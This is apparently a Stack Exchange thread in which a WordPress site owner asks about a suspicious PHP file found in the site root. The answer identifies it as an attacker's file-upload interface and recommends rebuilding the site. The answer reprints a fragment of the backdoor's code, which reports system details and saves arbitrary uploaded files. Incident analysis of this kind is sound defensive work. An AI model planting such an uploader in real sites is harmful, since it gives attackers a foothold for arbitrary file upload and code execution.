0

While going through the root directory of my site I found this RxR__kyfet.php file. This is a wordpress site.

I don't know php well enough to tell exactly what it does but it seems rather suspicious. I checked previous backups of the site and that file was not present.

I removed the file it but did keep a backup just in case.

Can anyone help me identify what it does for future reference?

Ulrich
  • 1
  • 3
    IT's hard for us to tell you what a file does if we don't have the contents of the file. Please update your post to include the contents of the file. Also, is your site just a pure PHP site, or does it use some sort of CMS like wordpress. – Dan Landberg Aug 01 '18 at 14:11
  • It uses wordpress. I tried adding the actual code into this but it kept automatically removing certain parts of it. I can give the unphp link for viewing though: https://www.unphp.net/decode/0c39220adc05c6e58769cc446c562c5e/ – Ulrich Aug 01 '18 at 14:30
  • You can link it if you you must, but SE prefers to avoid links, since links can break, and then the post itself becomes useless to future users. – Dan Landberg Aug 01 '18 at 14:33

1 Answers1

0

It appears to be an interface for uploading files to the local system. If you did not upload the file yourself, then it would appear that your system is compromised. Your safest bet is to rebuild the system from scratch, and apply the latest security patches for wordpress & any plugins that you use.

Here's the linked code for posterity: ' . 'Uname:' . php_uname() . '
' . $cwd = getcwd(); Echo '
'; if (!empty($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'], $_FILES['uploads']['name']); Echo "alert('upload Done'); Uploaded !!!
name : " . $_FILES['uploads']['name'] . "
size : " . $_FILES['uploads']['size'] . "
type : " . $_FILES['uploads']['type']; } ?>

Dan Landberg
  • 3,312
  • 12
  • 17